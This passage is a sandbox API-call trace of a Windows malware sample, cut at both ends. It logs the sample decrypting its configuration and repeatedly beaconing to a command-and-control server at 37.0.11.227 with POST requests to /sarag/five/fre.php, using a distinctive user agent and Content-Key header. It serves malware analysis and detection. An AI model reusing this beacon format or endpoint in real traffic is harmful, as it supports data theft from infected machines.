ai_next=0x0)) [0209.639] GetProcessHeap () returned 0x690000 [0209.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0209.639] GetProcessHeap () returned 0x690000 [0209.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0209.640] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.641] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.641] GetProcessHeap () returned 0x690000 [0209.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0209.641] GetProcessHeap () returned 0x690000 [0209.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.641] GetProcessHeap () returned 0x690000 [0209.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0209.641] GetProcessHeap () returned 0x690000 [0209.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0209.642] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.643] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.643] GetProcessHeap () returned 0x690000 [0209.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0209.643] GetProcessHeap () returned 0x690000 [0209.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.645] send (s=0x4c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0209.645] send (s=0x4c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0209.645] GetProcessHeap () returned 0x690000 [0209.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0209.645] recv (in: s=0x4c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0209.732] GetProcessHeap () returned 0x690000 [0209.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0209.734] GetProcessHeap () returned 0x690000 [0209.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0209.734] GetProcessHeap () returned 0x690000 [0209.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0209.734] GetProcessHeap () returned 0x690000 [0209.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0209.735] closesocket (s=0x4c0) returned 0 [0209.736] GetProcessHeap () returned 0x690000 [0209.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0209.736] GetProcessHeap () returned 0x690000 [0209.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.736] GetProcessHeap () returned 0x690000 [0209.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0209.736] GetProcessHeap () returned 0x690000 [0209.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0209.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x62c) returned 0x4c0 [0209.741] Sleep (dwMilliseconds=0xea60) [0209.759] GetProcessHeap () returned 0x690000 [0209.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0209.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0209.797] GetProcessHeap () returned 0x690000 [0209.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0209.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.798] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0209.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.799] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.800] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.800] GetProcessHeap () returned 0x690000 [0209.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0209.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.806] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0209.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.807] CryptDestroyKey (hKey=0x69d028) returned 1 [0209.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.808] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0209.808] GetProcessHeap () returned 0x690000 [0209.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.819] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.822] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.824] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.825] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.825] GetProcessHeap () returned 0x690000 [0209.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0209.826] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.826] GetProcessHeap () returned 0x690000 [0209.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0209.827] GetProcessHeap () returned 0x690000 [0209.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.827] GetProcessHeap () returned 0x690000 [0209.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0209.828] GetProcessHeap () returned 0x690000 [0209.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0209.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0209.846] GetProcessHeap () returned 0x690000 [0209.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0209.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.847] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0209.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.849] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.850] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.850] GetProcessHeap () returned 0x690000 [0209.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0209.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.852] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0209.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.855] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0209.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.857] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0209.857] GetProcessHeap () returned 0x690000 [0209.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.858] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0209.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.859] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0209.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.860] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0209.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.912] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0209.912] GetProcessHeap () returned 0x690000 [0209.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0209.912] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0209.912] GetProcessHeap () returned 0x690000 [0209.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0209.912] socket (af=2, type=1, protocol=6) returned 0x4c4 [0209.912] connect (s=0x4c4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0209.944] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0209.944] GetProcessHeap () returned 0x690000 [0209.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0209.944] GetProcessHeap () returned 0x690000 [0209.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0209.945] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.946] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.946] GetProcessHeap () returned 0x690000 [0209.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0209.946] GetProcessHeap () returned 0x690000 [0209.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.946] GetProcessHeap () returned 0x690000 [0209.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0209.946] GetProcessHeap () returned 0x690000 [0209.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0209.948] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0209.948] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.949] GetProcessHeap () returned 0x690000 [0209.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0209.949] GetProcessHeap () returned 0x690000 [0209.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0209.949] send (s=0x4c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0209.950] send (s=0x4c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0209.950] GetProcessHeap () returned 0x690000 [0209.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0209.950] recv (in: s=0x4c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0210.030] GetProcessHeap () returned 0x690000 [0210.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0210.030] GetProcessHeap () returned 0x690000 [0210.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0210.031] GetProcessHeap () returned 0x690000 [0210.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0210.031] GetProcessHeap () returned 0x690000 [0210.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0210.031] closesocket (s=0x4c4) returned 0 [0210.032] GetProcessHeap () returned 0x690000 [0210.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0210.032] GetProcessHeap () returned 0x690000 [0210.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.032] GetProcessHeap () returned 0x690000 [0210.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0210.032] GetProcessHeap () returned 0x690000 [0210.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0210.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfd4) returned 0x4c4 [0210.035] Sleep (dwMilliseconds=0xea60) [0210.036] GetProcessHeap () returned 0x690000 [0210.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0210.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.037] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.044] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0210.054] GetProcessHeap () returned 0x690000 [0210.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0210.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.055] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.058] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.058] GetProcessHeap () returned 0x690000 [0210.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0210.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.059] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0210.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.060] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.064] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0210.064] GetProcessHeap () returned 0x690000 [0210.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0210.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.066] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.067] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.068] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.070] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.070] GetProcessHeap () returned 0x690000 [0210.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0210.070] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.076] GetProcessHeap () returned 0x690000 [0210.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0210.077] GetProcessHeap () returned 0x690000 [0210.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0210.077] GetProcessHeap () returned 0x690000 [0210.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0210.078] GetProcessHeap () returned 0x690000 [0210.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0210.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.079] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.085] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0210.122] GetProcessHeap () returned 0x690000 [0210.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0210.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.124] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.126] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.127] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.127] GetProcessHeap () returned 0x690000 [0210.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0210.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.132] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0210.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.138] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.139] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0210.140] GetProcessHeap () returned 0x690000 [0210.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.141] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0210.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.147] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0210.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.148] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0210.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.150] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0210.150] GetProcessHeap () returned 0x690000 [0210.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0210.150] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0210.150] GetProcessHeap () returned 0x690000 [0210.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0210.151] socket (af=2, type=1, protocol=6) returned 0x4c8 [0210.152] connect (s=0x4c8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0210.193] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0210.193] GetProcessHeap () returned 0x690000 [0210.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0210.193] GetProcessHeap () returned 0x690000 [0210.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0210.193] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.194] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.194] GetProcessHeap () returned 0x690000 [0210.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0210.194] GetProcessHeap () returned 0x690000 [0210.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.195] GetProcessHeap () returned 0x690000 [0210.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0210.195] GetProcessHeap () returned 